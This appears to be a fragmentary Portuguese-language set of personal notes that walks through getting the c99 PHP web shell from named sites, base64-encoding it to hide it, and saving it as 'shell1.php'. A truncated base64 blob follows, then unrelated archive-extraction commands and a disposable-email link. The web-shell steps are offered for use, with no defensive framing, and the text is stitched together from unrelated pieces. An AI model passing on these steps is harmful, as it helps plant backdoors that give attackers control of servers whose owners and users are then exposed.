http://www.localroot.net/ or http://www.r57.gen.tr/ Choose shell c99 Colar no link abaixo e "encode", vai encodar em base64 gigante ... http://www.freeformatter.com/base64-encoder.html Clique ENCODE para gerar um codigo encriptografado gigante… LyoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi oqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKi8NCi8qDQovKiAgICAgICAgICAgICAgICAg ICAgICAgICAgICAgICAgICAgICAjICAgICMgICAgICAgICMgICAgIyAgICAgICAgICAgICAgICAgICAgICAgIC AgICAgDQovKiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAjICAgIyAgICAgICAgICAjICAg Iw0KLyogICAgICAgI : : Criando arquivo "shell1.php" e colar o codigo em base64 para dentro deste. nano shell1.php
Descompactar arquivos zip : gunzip nome_do_arquivo.zip ( unzip nome_do_arquivo.zip ) rar : unrar x nome_do_arquivo.rar tar : tar -xvf nome_do_arquivo.tar tar.gz : tar -vzxf nome_do_arquivo.tar.gz bz2 : bunzip nome_do_arquivo.bz2 tar.bz2 : tar -jxvf nome_do_arquivo.tar.bz2
http://10minutemail.com/10MinuteMail/index.html
Brasil - Santa Catarina - Timbó
By J.P ©
